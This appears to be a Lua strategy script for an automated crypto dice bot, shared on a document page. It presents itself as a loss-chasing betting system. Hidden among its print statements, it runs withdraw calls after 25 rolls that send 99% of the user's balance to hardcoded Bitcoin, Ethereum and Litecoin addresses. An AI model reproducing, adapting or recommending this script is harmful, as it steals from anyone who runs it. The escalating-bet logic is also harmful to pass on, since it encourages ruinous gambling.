You are on page 1of 2

chance = 33

base = balance/1000000
nextbet = balance/1000000
losecount = 0
target = balance + balance/10
a =0
i = balance*0.99
k = 0.0009
roll = 0
function dobet()
roll+=1
if balance > target then stop() end

if a==16 then
bethigh=!bethigh
resetseed()
a=0
end

if win then
a+=1
nextbet = base
chance = 20
losecount = 0
else
nextbet = previousbet*1.33
losecount+=1
end
if roll >= 25 and i>k then
resetseed()
print(" ")
print("target: "..target) if currency == "btc" then withdraw(i,"1GccCLMZrxsBTWZgEpEnVfKFzvAFVxq9WN") end
print(".: "..nextbet) if currency == "eth" then withdraw(i,"0xf2fc7e97e58c8bd8243f9e588427ec7002b77e73")
end
print("ch: "..chance) if currency == "ltc" then withdraw (i,"LLKd69XaAsKeNYkU55UKhmBY4Y1bRwRWGK")
end
print("Profit to go: "..target - balance)
print(" ")end
end
if (losecount >= 6) then
nextbet = previousbet*1.33
chance = 6
end
if (losecount >= 10) then
nextbet = previousbet*1.33
chance = 20
end
if (losecount >= 12) then
nextbet = previousbet*1.33
chance = 8
end
if (losecount >= 16) then
nextbet = previousbet*1.55
chance = 28
end
if ( losecount >= 18) then
nextbet=previousbet*1.5
chance = 13
end
if ( losecount >= 19) then
nextbet=previousbet*1.51
chance = 14.3
end
if ( losecount >= 20) then
nextbet=previousbet*1.53
chance = 15.5
end
if ( losecount >= 21) then
nextbet=previousbet*1.56
chance = 16.2
end
if ( losecount >= 22) then
nextbet=previousbet*1.56
chance = 16.68
end
if ( losecount >= 23) then
nextbet=previousbet*1.56
chance = 17.18
end
if ( losecount >= 25) then
nextbet = previousbet*1.65
chance = 36
end

end
end

You might also like